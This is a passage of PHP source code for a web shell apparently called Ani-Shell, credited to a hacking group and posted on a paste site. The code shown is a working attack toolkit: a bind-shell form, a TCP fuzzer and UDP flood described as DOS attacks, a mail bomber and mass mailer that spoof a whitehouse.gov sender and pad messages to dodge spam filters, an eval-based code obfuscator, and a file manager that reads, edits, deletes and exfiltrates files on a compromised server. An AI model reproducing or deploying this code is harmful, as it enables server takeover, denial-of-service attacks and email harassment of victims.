  1765.                         </select>&nbsp;&nbsp;<input style="width: 90px;" class="own" type="submit" value="Connect!"/></td>
  1766.                
  1767.             </table>
  1768.          </td>
  1769.          </form>
  1770.          <form method="POST">
  1771.          <td>
  1772.             <table style="border-spacing: 6px;">
  1773.                 <tr>
  1774.                     <td>Port</td>
  1775.                     <td>
  1776.                         <input style="width: 200px;" class="cmd" name="port" value="31337" />
  1777.                     </td>
  1778.                 </tr>
  1779.                 <tr>
  1780.                     <td>Passwd </td>
  1781.                     <td><input style="width: 100px;" class="cmd" name="passwd" size='5' value="lionaneesh"/>
  1782.                 </tr>
  1783.                 <tr>
  1784.                 <td>
  1785.                 Mode
  1786.                 </td>
  1787.                 <td>
  1788.                         <select name="mode" class="cmd">
  1789.                             <option value="PHP">PHP</option>
  1790.                             <option value="Python">Python</option>
  1791.                         </select> &nbsp;&nbsp;<input style="width: 90px;" class="own" type="submit" value="Bind :D!"/></td>
  1792.                 </tr>    
  1793.                    
  1794.             </table>
  1795.          </td>
  1796.          </form>
  1797.     </tr>
  1798.     </table>
  1799.     <p align="center" style="color: red;" >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
  1800. <?php
  1801.     }
  1802. }
  1803.  
  1804. //fuzzer
  1805.  
  1806. else if(isset($_GET['fuzz']))
  1807. {
  1808.     if(isset($_GET['ip']) &&
  1809.     isset($_GET['port']) &&
  1810.     isset($_GET['times']) &&
  1811.     isset($_GET['time']) &&
  1812.     isset($_GET['message']) &&
  1813.     isset($_GET['messageMultiplier']) &&
  1814.     $_GET['message'] != "" &&
  1815.     $_GET['time'] != "" &&
  1816.     $_GET['times'] != "" &&
  1817.     $_GET['port'] != "" &&
  1818.     $_GET['ip'] != "" &&
  1819.     $_GET['messageMultiplier'] != ""
  1820.     )
  1821.     {
  1822.        $IP=$_GET['ip'];
  1823.        $port=$_GET['port'];
  1824.        $times = $_GET['times'];
  1825.        $timeout = $_GET['time'];
  1826.        $send = 0;
  1827.        $ending = "";
  1828.        $multiplier = $_GET['messageMultiplier'];
  1829.        $data = "";
  1830.        $mode="tcp";
  1831.        $data .= "GET /";
  1832.        $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
  1833.         if($_GET['type'] == "tcp")
  1834.         {
  1835.             $mode = "tcp";
  1836.         }
  1837.         while($multiplier--)
  1838.         {
  1839.             $data .= urlencode($_GET['message']);
  1840.         }
  1841.         $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
  1842.         $data .= "by-Ani-shell".$ending;
  1843.         $length = strlen($data);
  1844.        
  1845.        
  1846.        echo "Sending Data :- <br /> <p align='center'>$data</p>";
  1847.        
  1848.        print "I am at ma Work now :D ;D! Dont close this window untill you recieve a message <br>";
  1849.        for($i=0;$i<$times;$i++)
  1850.        {
  1851.             $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
  1852.             if($socket)
  1853.             {
  1854.                 fwrite($socket , $data , $length );
  1855.                 fclose($socket);
  1856.             }
  1857.         }
  1858.         echo "<script>alert('Fuzzing Completed!');</script>";
  1859.         echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
  1860.         echo "Total Number of Packets Sent : " . $times . "<br />";
  1861.         echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
  1862.         echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
  1863.     }
  1864.     else
  1865.     {
  1866.         ?>
  1867.         <form method="GET">
  1868.             <input type="hidden" name="fuzz" />
  1869.             <table id="margins">
  1870.                 <tr>
  1871.                     <td width="400" class="title">
  1872.                         IP
  1873.                     </td>
  1874.                     <td>
  1875.                         <input class="cmd" name="ip" value="127.0.0.1" onfocus="if(this.value == '127.0.0.1')this.value = '';" onblur="if(this.value=='')this.value='127.0.0.1';"/>
  1876.                     </td>
  1877.                 </tr>
  1878.                
  1879.                 <tr>
  1880.                     <td class="title">
  1881.                         Port
  1882.                     </td>
  1883.                     <td>
  1884.                         <input class="cmd" name="port" value="80" onfocus="if(this.value == '80')this.value = '';" onblur="if(this.value=='')this.value='80';"/>
  1885.                     </td>
  1886.                 </tr>
  1887.                
  1888.                 <tr>
  1889.                     <td class="title">
  1890.                         Timeout
  1891.                     </td>
  1892.                     <td>
  1893.                         <input type="text" class="cmd" name="time" value="5" onfocus="if(this.value == '5')this.value = '';" onblur="if(this.value=='')this.value='5';"/>
  1894.                     </td>
  1895.                 </tr>
  1896.                
  1897.                
  1898.                 <tr>
  1899.                     <td class="title">
  1900.                         No of times
  1901.                     </td>
  1902.                     <td>
  1903.                         <input type="text" class="cmd" name="times" value="100" onfocus="if(this.value == '100')this.value = '';" onblur="if(this.value=='')this.value='100';" />
  1904.                     </td>
  1905.                 </tr>
  1906.                
  1907.                 <tr>
  1908.                     <td class="title">
  1909.                         Message <font color="red">(The message Should be long and it will be multiplied with the value after it)</font>
  1910.                     </td>
  1911.                     <td>
  1912.                         <input class="cmd" name="message" value="%S%x--Some Garbage here --%x%S" onfocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onblur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
  1913.                     </td>
  1914.                     <td>
  1915.                         x
  1916.                     </td>
  1917.                     <td width="20">
  1918.                         <input style="width: 30px;" class="cmd" name="messageMultiplier" value="10" />
  1919.                     </td>
  1920.                 </tr>
  1921.                
  1922.                 <tr>
  1923.                     <td rowspan="2">
  1924.                         <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="own" value="Let it Rip! :D"/>
  1925.                     </td>
  1926.                 </tr>
  1927.             </table>            
  1928.         </form>
  1929.         <?php
  1930.     }
  1931. }
  1932.  
  1933.  
  1934. //DDos
  1935.  
  1936. else if(isset($_GET['dos']))
  1937. {
  1938.     if(isset($_GET['ip']) &&
  1939.     isset($_GET['exTime']) &&
  1940.     isset($_GET['port']) &&
  1941.     isset($_GET['timeout']) &&
  1942.     isset($_GET['exTime']) &&
  1943.     $_GET['exTime'] != "" &&
  1944.     $_GET['port'] != "" &&
  1945.     $_GET['ip'] != "" &&
  1946.     $_GET['timeout'] != "" &&
  1947.     $_GET['exTime'] != ""
  1948.     )
  1949.     {
  1950.        $IP=$_GET['ip'];
  1951.        $port=$_GET['port'];
  1952.        $executionTime = $_GET['exTime'];
  1953.        $noOfBytes = $_GET['noOfBytes'];
  1954.        $data = "";
  1955.        $timeout = $_GET['timeout'];
  1956.        $packets = 0;
  1957.        $counter = $noOfBytes;
  1958.        $maxTime = time() + $executionTime;;
  1959.        while($counter--)
  1960.        {
  1961.             $data .= "X";
  1962.        }
  1963.        $data .= "-by-Ani-Shell";
  1964.        print "I am at ma Work now :D ;D! Dont close this window untill you recieve a message <br>";
  1965.        
  1966.        while(1)
  1967.        {
  1968.             $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
  1969.             if($socket)
  1970.             {
  1971.                 fwrite($socket , $data);
  1972.                 fclose($socket);
  1973.                 $packets++;
  1974.             }
  1975.             if(time() >= $maxTime)
  1976.             {
  1977.                 break;
  1978.             }
  1979.         }
  1980.         echo "<script>alert('DDos Completed!');</script>";
  1981.         echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
  1982.         echo "Total Number of Packets Sent : " . $packets . "<br />";
  1983.         echo "Total Data Sent = ". HumanReadableFilesize($packets*$noOfBytes) . "<br />";
  1984.         echo "Data per packet = " . HumanReadableFilesize($noOfBytes) . "<br />";
  1985.     }
  1986.     else
  1987.     {
  1988.  
  1989.         ?>
  1990.         <form method="GET">
  1991.             <input type="hidden" name="dos" />
  1992.             <table id="margins">
  1993.                 <tr>
  1994.                     <td width="400" class="title">
  1995.                         IP
  1996.                     </td>
  1997.                     <td>
  1998.                         <input class="cmd" name="ip" value="127.0.0.1" onfocus="if(this.value == '127.0.0.1')this.value = '';" onblur="if(this.value=='')this.value='127.0.0.1';"/>
  1999.                     </td>
  2000.                 </tr>
  2001.                
  2002.                 <tr>
  2003.                     <td class="title">
  2004.                         Port
  2005.                     </td>
  2006.                     <td>
  2007.                         <input class="cmd" name="port" value="80" onfocus="if(this.value == '80')this.value = '';" onblur="if(this.value=='')this.value='80';"/>
  2008.                     </td>
  2009.                 </tr>
  2010.                
  2011.                 <tr>
  2012.                     <td class="title">
  2013.                         Timeout <font color="red">(Time in seconds)</font>
  2014.                     </td>
  2015.                     <td>
  2016.                         <input type="text" class="cmd" name="timeout" value="5" onfocus="if(this.value == '5')this.value = '';" onblur="if(this.value=='')this.value='5';" />
  2017.                     </td>
  2018.                 </tr>
  2019.                
  2020.                
  2021.                 <tr>
  2022.                     <td class="title">
  2023.                         Execution Time <font color="red">(Time in seconds)</font>
  2024.                     </td>
  2025.                     <td>
  2026.                         <input type="text" class="cmd" name="exTime" value="10" onfocus="if(this.value == '10')this.value = '';" onblur="if(this.value=='')this.value='10';"/>
  2027.                     </td>
  2028.                 </tr>
  2029.                
  2030.                 <tr>
  2031.                     <td class="title">
  2032.                         No of Bytes per/packet
  2033.                     </td>
  2034.                     <td>
  2035.                         <input type="text" class="cmd" name="noOfBytes" value="999999" onfocus="if(this.value == '999999')this.value = '';" onblur="if(this.value=='')this.value='999999';"/>
  2036.                     </td>
  2037.                 </tr>
  2038.                
  2039.  
  2040.                 <tr>
  2041.                     <td rowspan="2">
  2042.                         <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="own" value="Let it Rip! :D"/>
  2043.                     </td>
  2044.                 </tr>
  2045.             </table>            
  2046.         </form>
  2047.         <?php
  2048.     }
  2049. }
  2050.  
  2051. // Mail Bomber
  2052.  
  2053. else if(isset($_GET['bomb']))
  2054. {
  2055.     if(
  2056.         isset($_GET['to']) &&
  2057.         isset($_GET['subject']) &&
  2058.         isset($_GET['message']) &&
  2059.         isset($_GET['times']) &&
  2060.         $_GET['to'] != '' &&
  2061.         $_GET['subject'] != '' &&
  2062.         $_GET['message'] != '' &&
  2063.         $_GET['times'] != ''
  2064.     )
  2065.     {
  2066.         $times = $_GET['times'];
  2067.         while($times--)
  2068.         {
  2069.             if(isset($_GET['padding']))
  2070.             {
  2071.                 $fromPadd = rand(0,9999);
  2072.                 $subjectPadd = " -- ID : ".rand(0,9999999);
  2073.                 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
  2074.                
  2075.             }
  2076.             $from = "president$fromPadd@whitehouse.gov";
  2077.             if(!mail($_GET['to'],$_GET['subject'].$subjectPadd,$_GET['message'].$messagePadd,"From:".$from))
  2078.             {
  2079.                 $error = 1;
  2080.                 echo "<p class='alert_red'>Some Error Occured!</p>";
  2081.                 break;
  2082.             }
  2083.         }
  2084.         if($error != 1)
  2085.         {
  2086.             echo "<p class='alert_green'>Mail(s) Sent!</p>";
  2087.         }
  2088.     }
  2089.     else
  2090.     {
  2091.         ?>
  2092.         <form method="GET">
  2093.             <input type="hidden" name="bomb" />
  2094.             <table id="margins">
  2095.                 <tr>
  2096.                     <td class="title">
  2097.                         To
  2098.                     </td>
  2099.                     <td>
  2100.                         <input class="cmd" name="to" value="victim@domain.com,victim2@domain.com" onfocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onblur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
  2101.                     </td>
  2102.                 </tr>
  2103.                
  2104.                 <tr>
  2105.                     <td class="title">
  2106.                         Subject
  2107.                     </td>
  2108.                     <td>
  2109.                         <input type="text" class="cmd" name="subject" value="Just testing my Fucking Skillz!" onfocus="if(this.value == 'Just testing my Fucking Skillz!')this.value = '';" onblur="if(this.value=='')this.value='Just testing my Fucking Skillz!';" />
  2110.                     </td>
  2111.                 </tr>
  2112.                  <tr>
  2113.                     <td class="title">
  2114.                         No. of Times  
  2115.                     </td>
  2116.                     <td>
  2117.                         <input class="cmd" name="times" value="100" onfocus="if(this.value == '100')this.value = '';" onblur="if(this.value=='')this.value='100';"/>
  2118.                     </td>
  2119.                 </tr>
  2120.        
  2121.                 <tr>
  2122.                     <td>
  2123.                        
  2124.                         Pad your message (Less spam detection)
  2125.                        
  2126.                     </td>
  2127.                     <td>
  2128.                    
  2129.                         <input type="checkbox" name="padding"/>
  2130.                          
  2131.                     </td>
  2132.                 </tr>
  2133.                 <tr>
  2134.                     <td colspan="2">
  2135.                         <textarea name="message" cols="110" rows="10" class="cmd">Ani-Shell Rocks!!</textarea>
  2136.                     </td>
  2137.                 </tr>
  2138.                
  2139.                
  2140.                 <tr>
  2141.                     <td rowspan="2">
  2142.                         <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="own" value="Send! :D"/>
  2143.                     </td>
  2144.                 </tr>
  2145.             </table>            
  2146.         </form>  
  2147.         <?php
  2148.     }
  2149. }
  2150.  
  2151. //Mass Mailer
  2152.  
  2153. else if(isset($_GET['mail']))
  2154. {
  2155.     if(
  2156.         isset($_GET['to']) &&
  2157.         isset($_GET['from']) &&
  2158.         isset($_GET['subject']) &&
  2159.         isset($_GET['message'])
  2160.     )
  2161.     {
  2162.  
  2163.         if(mail($_GET['to'],$_GET['subject'],$_GET['message'],"From:".$_GET['from']))
  2164.         {
  2165.             echo "<p class='alert_green'>Mail Sent!</p>";
  2166.         }
  2167.         else
  2168.         {
  2169.             echo "<p class='alert_red'>Some Error Occured!</p>";
  2170.         }
  2171.     }
  2172.     else
  2173.     {
  2174.         ?>
  2175.         <form method="GET">
  2176.             <input type="hidden" name="mail" />
  2177.             <table id="margins">
  2178.                 <tr>
  2179.                     <td width="100" class="title">
  2180.                         From
  2181.                     </td>
  2182.                     <td>
  2183.                         <input class="cmd" name="from" value="president@whitehouse.gov" onfocus="if(this.value == 'president@whitehouse.gov')this.value = '';" onblur="if(this.value=='')this.value='president@whitehouse.gov';"/>
  2184.                     </td>
  2185.                 </tr>
  2186.                
  2187.                 <tr>
  2188.                     <td class="title">
  2189.                         To
  2190.                     </td>
  2191.                     <td>
  2192.                         <input class="cmd" name="to" value="victim@domain.com,victim2@domain.com" onfocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onblur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
  2193.                     </td>
  2194.                 </tr>
  2195.                
  2196.                 <tr>
  2197.                     <td class="title">
  2198.                         Subject
  2199.                     </td>
  2200.                     <td>
  2201.                         <input type="text" class="cmd" name="subject" value="Just testing my Fucking Skillz!" onfocus="if(this.value == 'Just testing my Fucking Skillz!')this.value = '';" onblur="if(this.value=='')this.value='Just testing my Fucking Skillz!';" />
  2202.                     </td>
  2203.                 </tr>
  2204.                
  2205.                
  2206.                 <tr>
  2207.                     <td colspan="2">
  2208.                         <textarea name="message" cols="110" rows="10" class="cmd">All i remember are those lonely nights when i was defacing those insecure websites!</textarea>
  2209.                     </td>
  2210.                 </tr>
  2211.                
  2212.                
  2213.                 <tr>
  2214.                     <td rowspan="2">
  2215.                         <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="own" value="Send! :D"/>
  2216.                     </td>
  2217.                 </tr>
  2218.             </table>            
  2219.         </form>  
  2220.         <?php
  2221.     }
  2222. }
  2223.  
  2224.  
  2225. // Edit File
  2226.  
  2227. else if(isset($_POST['file']) &&
  2228.         isset($_POST['content']) )
  2229. {
  2230.     if(is_dir($_POST['file']))
  2231.     {
  2232.         header("location:".$self."?dir=".$_POST['file']);
  2233.     }
  2234.     if(file_exists($_POST['file']))
  2235.     {
  2236.         $handle = fopen($_POST['file'],"w");
  2237.     if (!handle) echo "<p class='alert_red'>Permission Denied</p>";
  2238.     else {
  2239.             fwrite($handle,$_POST['content']);
  2240.             echo "Your changes were Successfully Saved!";
  2241.         }
  2242.     }
  2243.     else
  2244.     {
  2245.         echo "<p class='alert_red'>File Name Specified does not exists!</p>";
  2246.     }
  2247. }
  2248.  
  2249. // PHP Obfuscator
  2250.  
  2251. else if(isset($_GET['obfuscate']))
  2252. {
  2253.     if ( isset($_POST['code']) &&
  2254.                $_POST['code'] != '')
  2255.     {
  2256.         $encoded = base64_encode(gzdeflate(trim(stripslashes($_POST['code'].' '),'<?php,?>'),9)); // high Compression! :P
  2257.         $encode = '
  2258. <?php
  2259. $encoded = \''.$encoded.'\';
  2260. eval(gzinflate(base64_decode($encoded)));
  2261. // Script Encoded by Ani-Shell
  2262. ?>
  2263. ';
  2264.     }
  2265.     else
  2266.     {
  2267.         $encode = 'Please Enter your Code! and Click Submit! :)';    
  2268.     }?>
  2269.     <form method="POST">
  2270.         <textarea class="cmd" cols="100" rows="20" name="code"><?php echo $encode;?></textarea><br />
  2271.         <input style="margin: 20px; margin-left: 50px; padding: 10px;"  class="own"  type="submit" value="Encode :D"/>
  2272.     </form>
  2273.    
  2274.     <?php
  2275. }
  2276.  
  2277. //open file
  2278.  
  2279. else if(isset($_GET['open']))
  2280. {
  2281.     ?>
  2282.     </center>
  2283.         <form method="POST" action="<?php echo $self;?>" >
  2284.         <table>
  2285.             <tr>
  2286.                 <td>File </td><td> : </td><td><input value="<?php echo $_GET['open'];?>" class="cmd" name="file" /></td>
  2287.             </tr>
  2288.             <tr>
  2289.                 <td>Size </td><td> : </td><td><input value="<?php echo filesize($_GET['open']);?>" class="cmd" /></td>
  2290.             </tr>
  2291.         </table>
  2292.         <textarea name="content" rows="20" cols="60" class="cmd"><?php
  2293.         $content = htmlspecialchars(file_get_contents($_GET['open']));
  2294.         if($content)
  2295.         {
  2296.             echo $content;
  2297.         }
  2298.         else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
  2299.         {
  2300.             $fd = fopen($_GET['open']);
  2301.         if (!$fd) echo "<p class='alert_red'>Permission Denied</p>";
  2302.         else {
  2303.             while(!feof())
  2304.             {
  2305.                 echo htmlspecialchars(fgets($fd));
  2306.             }
  2307.             }
  2308.         }
  2309.  
  2310.         ?>
  2311.         </textarea><br />
  2312.         <input name="save" type="Submit" value="Save Changes" class="own" id="spacing"/>
  2313.         </form>
  2314.     <?php
  2315. }
  2316.  
  2317. //Rename
  2318.  
  2319. else if(isset($_GET['rename']))
  2320. {
  2321.     if(isset($_GET['to']) && isset($_GET['rename']))
  2322.     {
  2323.         if(rename($_GET['rename'],$_GET['to']) == FALSE)
  2324.         {
  2325.             ?>
  2326.             <big><p class="blink">Cant rename the file specified! Please check the file-name , Permissions and try again!</p></big>
  2327.             <?php
  2328.         }
  2329.         else
  2330.         {
  2331.             ?>
  2332.             <big><p class="blink">File Renamed , Return <a href="<?php echo $self;?>">Here</a></p></big>
  2333.             <?php
  2334.         }
  2335.     }
  2336.     else
  2337.     {
  2338. ?>
  2339.     <form method="GET" action="<?php echo $self;?>" >
  2340.         <table>
  2341.             <tr>
  2342.                 <td>File </td><td> : </td><td><input value="<?php echo $_GET['rename'];?>" class="cmd" name="rename" /></td>
  2343.             </tr>
  2344.             <tr>
  2345.                 <td>To </td><td> : </td><td><input value="<?php echo $_GET['rename'];?>" class="cmd" name="to" /></td>
  2346.             </tr>
  2347.         </table>
  2348.         <input type="Submit" value="Rename :D" class="own" style="margin-left: 160px;padding: 5px;"/>
  2349.         </form>  
  2350.     <?php
  2351.     }
  2352. }
  2353. // No request made
  2354. // Display home page
  2355.  
  2356. else
  2357. {
  2358.     echo "    </center>";
  2359.     $dir = getcwd();
  2360.     if(isset($_GET['dir']))
  2361.     {
  2362.         $dir = $_GET['dir'];
  2363.     }
  2364.     ?>
  2365.     <table id="margins">
  2366.     <tr>
  2367.         <form method="GET" action="<?php echo $self;?>">
  2368.         <td width="100">PWD</td><td width="410"><input name="dir" class="cmd" id="mainInput" value="<?php echo $dir;?>"/></td>
  2369.         <td><input type="submit" value="GO" class="own" /></td>
  2370.         </form>
  2371.     </tr>
  2372.     </table>
  2373.    
  2374.     <table id="margins" class="files">
  2375.     <tr>
  2376.         <th class="header" width="500px">Name</th>
  2377.         <th width="100px" class="header">Size</th>
  2378.         <th width="100px" class="header">Permissions</th>
  2379.         <th width="100px" class="header">Delete</th>
  2380.         <th width="100px" class="header">Rename</th>
  2381.     <th width="100px" class="header">Zip</th>
  2382.     </tr>
  2383.     <?php
  2384.    
  2385.     if(isset($_GET['delete']))
  2386.     {
  2387.         if(unlink(($_GET['delete'])) == FALSE)
  2388.         {
  2389.             echo "<p id='margins' class='alert_red'>Could Not Delete the FILE Specified</p>";
  2390.         }
  2391.     }
  2392.  
  2393.     else if(isset($_GET['delete_dir']))
  2394.     {
  2395.         if(rmdir(($_GET['delete'])) == FALSE)
  2396.         {
  2397.             echo "<p id='margins' class='alert_red'>Could Not Delete the DIRECTORY Specified</p>";
  2398.         }
  2399.     }
  2400.  
  2401.     if(is_dir($dir))
  2402.     {
  2403.         $handle = opendir($dir);
  2404.         if($handle != FALSE)
  2405.         {
  2406.         if($dir[(strlen($dir)-1)] != $SEPARATOR){$dir = $dir.$SEPARATOR;}
  2407.         while (($file = readdir($handle)) != false) {
  2408.                 if ($file != "." && $file != "..")
  2409.             {
  2410.        
  2411.         $color = 'red';
  2412.         if(is_readable($dir.$file))
  2413.         {
  2414.             $color = 'yellow';
  2415.         }
  2416.         if(is_writable($dir.$file))
  2417.         {
  2418.             $color = 'green';
  2419.         }
  2420.        
  2421.                 if(is_dir($dir.$file))
  2422.                 {
  2423.                     ?>
  2424.                     <tr>
  2425.                     <td class='dir'><a style="color: <?php echo $color?>;" href='<?php echo $self ?>?dir=<?php echo $dir.$file ?>'><b>/<?php echo $file ?></b></a></td>
  2426.                     <td class='info'><?php echo HumanReadableFilesize(dirSize($dir.$file));?></td>
  2427.                     <td class='info'><?php echo getFilePermissions($dir.$file);?></td>
  2428.                     <td class="info"><a href="<?php echo $self;?>?delete_dir=<?php echo $dir.$file;?>">Delete</a></td>
  2429.                     <td class="info"><a href="<?php echo $self;?>?rename=<?php echo $dir.$file;?>">Rename</a></td>
  2430.             <td class="info"><a href="<?php echo $self;?>?zip=<?php echo $dir.$file;?>">Download (zip)</a></td>
  2431.                     </tr>
  2432.                 <?php
  2433.                 }
  2434.                 //Its a file
  2435.                 else
  2436.                 {
  2437.                     ?>
  2438.                     <tr>
  2439.                     <td class='file'><a style="color: <?php echo $color?>;" href='<?php echo $self ?>?open=<?php echo $dir.$file ?>'><?php echo $file ?></a></td>
  2440.                     <td class='info'><?php echo HumanReadableFilesize(filesize($dir.$file));?></td>
  2441.                     <td class='info'><?php echo getFilePermissions($dir.$file);?></td>
  2442.                     <td class="info"><a href="<?php echo $self;?>?delete=<?php echo $dir.$file;?>">Delete</a></td>
  2443.                     <td class="info"><a href="<?php echo $self;?>?rename=<?php echo $dir.$file;?>">Rename</a></td>
  2444.                 <td class="info"><a href="<?php echo $self;?>?zip=<?php echo $dir.$file;?>">Download (zip)</a></td>
  2445.                     </tr>
  2446.                     <?php
  2447.                 }
  2448.             }
  2449.         }
  2450.         closedir($handle);
  2451.         }
  2452.     }
  2453.     else
  2454.     {
  2455.         echo "<p class='alert_red' id='margins'>Permission Denied</p>";
  2456.     }
  2457.     ?>
  2458.     </table>
  2459.     <?php
  2460.  
  2461. }
  2462. //------------------------------------------------------------------------------------------------
  2463. ?>
  2464.  
  2465. <?php
  2466. }
  2467. // End Shell
  2468. //-------------------------------------------------------------------------------------------------
  2469. ?>
  2470.   <div class="clearfooter"></div>
  2471. </div>
  2472.  
  2473. <div class="end" id='footer' style="margin-top: 20px;">
  2474. <p align="center"><b>(C) Copyright Mauritania Zombie HaCkers [All rights reserved]</b><br />
  2475. (: <a href="https://www.facebook.com/groups/362313117170636/">Follow us</a> | <a href="http://facebook.com/mauritanie.forever">Facebook</a> :) <br />
  2476. \m/ <b>Greetz to</b> : To All Mauritania Zombie HaCkers M3mb3erz ! \m/<br />
  2477. <CENTER><IMG alt=Factor-X src="http://us.cdn1.123rf.com/168nwm/jackf/jackf0906/jackf090600106/4985231-icone-de-la-mauritanie-illustration-sur-fond-blanc.jpg" width=350
  2478.  
  2479. height=150></A></CENTER>
  2480. </p>
  2481. </div>
  2482.  
  2483. </body>
  2484. </html>
Add Comment
Please, Sign In to add comment